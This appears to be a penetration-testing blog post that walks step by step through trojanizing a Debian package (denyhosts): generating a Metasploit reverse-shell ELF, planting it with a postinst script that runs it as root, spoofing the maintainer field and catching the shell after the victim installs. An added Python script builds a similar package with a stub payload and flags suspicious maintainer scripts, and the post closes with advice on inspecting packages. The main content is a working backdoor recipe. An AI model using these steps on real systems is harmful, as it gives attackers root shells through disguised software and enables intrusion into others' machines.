First, download the package you are going to infect. For my test case I am going to use the denyhosts package; it is a simple package that blocks hosts after repeated failed ssh logins. From the console, type
apt-get install denyhosts
I then navigate to /var/cache/apt/archives/ on my BackTrack 4 machine (apt-get keeps the downloaded .deb files there) and copy the denyhosts .deb package to another location for modification. In the new location, extract the contents of the .deb package by typing
dpkg -x denyhosts_2.6-5_all.deb test
dpkg -x extracts only the package's data archive (the files that get installed), not its control archive, so this creates a folder called test containing the installed file tree but no DEBIAN directory. A simple ls reveals the following folders:
etc usr var workdir
Next, generate your payload with msfpayload. On my BackTrack 4 I prefer linux/x86/shell/reverse_tcp. LHOST must be set to the IP address of the machine that will run the handler (the value is left blank in the command shown); on the console, I type the following.
/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=4444 X > linux_payload
This creates a payload file called linux_payload in your current directory (the X option tells msfpayload to emit an ELF executable).
Inside test, create a folder called DEBIAN, and in that folder create two files: control and postinst. The control file defines the package; dpkg-deb refuses to build without at least the Package, Version, Architecture, Maintainer and Description fields, and these should match the original package (here denyhosts, 2.6-5, all) so the result looks legitimate. Mine spoofs the maintainer field, for example:
Maintainer: Ubuntu developers
The postinst file must be executable (chmod 755), because dpkg runs it after the package's files have been unpacked. It should start with a shebang line and contain the command that launches the payload from the path it is installed to. My postinst file looks like this.
#!/bin/sh
chmod 2755 /usr/share/denyhosts/linux_payload && /usr/share/denyhosts/linux_payload &
For this to work, copy your payload (linux_payload) into the extracted folder (test) at test/usr/share/denyhosts, so that it is installed at the path the postinst expects.
Now we are ready to build the Debian package. From the console, type the following
dpkg-deb --build test
This writes the malicious package to test.deb next to the test folder (dpkg-deb names the archive after the directory unless you pass an output filename as a second argument). Start exploit/multi/handler with the same payload, LHOST and LPORT you gave msfpayload so it can catch the session. Scp the Debian package to another machine and install it with the usual dpkg -i [package_name]. As soon as the package is installed, you should receive a reverse shell on your machine.
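As an added example (not code from the original post), the following Python script reproduces what the steps above build, without needing dpkg: a .deb is an ar archive holding debian-binary, control.tar.* (the DEBIAN/control file plus maintainer scripts) and data.tar.* (the installed files). It assembles such a package in memory and then does the check a defender should do before running dpkg -i on a package from an untrusted source: list the maintainer scripts and flag ones that background a process or execute a file the package itself ships. The package name, version, fake maintainer and the "payload" bytes are constructed stand-ins; the postinst line is the one from the post.

```python
"""Build a .deb with a postinst hook and inspect it before installing, without dpkg.

Added example, not from the original post. A binary .deb is an ar(1) archive of
debian-binary, control.tar.* and data.tar.*, which is what `dpkg-deb --build`
produces. Package metadata and payload bytes below are constructed stand-ins.
"""
import io
import tarfile
import time

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm", "config")


def _ar_member(name, data):
    """One ar member: 60-byte header, data, then a newline pad to an even length."""
    header = (f"{name:<16}{int(time.time()):<12}{0:<6}{0:<6}{'100644':<8}"
              f"{len(data):<10}`\n").encode()
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def _tar_gz(members):
    """Pack {path: (content, mode)} into a gzip-compressed tar held in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (content, mode) in members.items():
            info = tarfile.TarInfo(name=path)
            info.size, info.mode, info.mtime = len(content), mode, int(time.time())
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_deb(package, version, arch, maintainer, description, files, postinst=None):
    """Return the bytes of a binary package; `files` maps install paths to (content, mode)."""
    control = (f"Package: {package}\nVersion: {version}\nArchitecture: {arch}\n"
               f"Maintainer: {maintainer}\nDescription: {description}\n").encode()
    control_members = {"./control": (control, 0o644)}
    if postinst is not None:
        control_members["./postinst"] = (postinst.encode(), 0o755)  # dpkg needs it executable
    data_members = {"./" + p.lstrip("/"): v for p, v in files.items()}
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar_gz(control_members))
            + _ar_member("data.tar.gz", _tar_gz(data_members)))


def read_ar(blob):
    """Parse an ar archive into {member name: bytes}."""
    assert blob.startswith(b"!<arch>\n"), "not an ar archive"
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[0:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are padded to even offsets
    return members


def _install_path(tar_name):
    return "/" + (tar_name[2:] if tar_name.startswith("./") else tar_name.lstrip("/"))


def inspect_deb(blob):
    """Report control fields, maintainer scripts, shipped executables and suspicious lines."""
    members = read_ar(blob)
    assert members.get("debian-binary", b"").strip() == b"2.0", "not a 2.0 .deb"
    ctrl_blob = next(v for k, v in members.items() if k.startswith("control.tar"))
    data_blob = next(v for k, v in members.items() if k.startswith("data.tar"))
    control, scripts = {}, {}
    with tarfile.open(fileobj=io.BytesIO(ctrl_blob), mode="r:*") as tar:
        for m in tar.getmembers():
            if not m.isfile():
                continue
            base, content = m.name.split("/")[-1], tar.extractfile(m).read()
            if base == "control":
                control = dict(line.split(": ", 1) for line in content.decode().splitlines()
                               if ": " in line)
            elif base in MAINTAINER_SCRIPTS:
                scripts[base] = content.decode()
    with tarfile.open(fileobj=io.BytesIO(data_blob), mode="r:*") as tar:
        executables = [_install_path(m.name) for m in tar.getmembers()
                       if m.isfile() and m.mode & 0o111]
    findings = []
    for name, body in scripts.items():
        for line in body.splitlines():
            cmd = line.strip()
            if not cmd or cmd.startswith("#"):
                continue
            if cmd.endswith("&"):
                findings.append(f"{name}: backgrounds a process: {cmd}")
            for exe in executables:
                if exe in cmd:
                    findings.append(f"{name}: executes a file shipped by this package: {exe}")
                    break
    return {"control": control, "scripts": scripts, "executables": executables,
            "findings": findings}


def trojaned_sample():
    """Constructed stand-in for the post's package: the 'payload' is a fake ELF stub."""
    return build_deb("denyhosts", "2.6-5", "all", "Ubuntu developers", "stub package",
                     {"/usr/share/denyhosts/linux_payload": (b"\x7fELF-stub", 0o755)},
                     postinst="#!/bin/sh\nchmod 2755 /usr/share/denyhosts/linux_payload "
                              "&& /usr/share/denyhosts/linux_payload &\n")


if __name__ == "__main__":
    report = inspect_deb(trojaned_sample())
    print(report["control"])
    for finding in report["findings"]:
        print("WARNING:", finding)
```

The inspector reads gz, bz2 and xz control and data archives via tarfile's "r:*" mode; packages built by recent dpkg may use zstd (control.tar.zst), which the standard library cannot open, so for those fall back to dpkg-deb --info and dpkg-deb -e. The heuristic is deliberately narrow: a maintainer script that launches something the package itself ships, or backgrounds a command so dpkg returns cleanly, is exactly the pattern this post relies on.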
I don't have any rpm-based system at the moment, but I hope somebody tries it out.
Lesson: don't install packages from people you don't trust. dpkg -i verifies no signature and runs the maintainer scripts as root, so at minimum inspect a .deb that did not come from your signed repositories before installing it (dpkg-deb --info lists the control data and maintainer scripts, dpkg-deb -e extracts them for reading, and dpkg-deb -c lists the files it would drop on disk).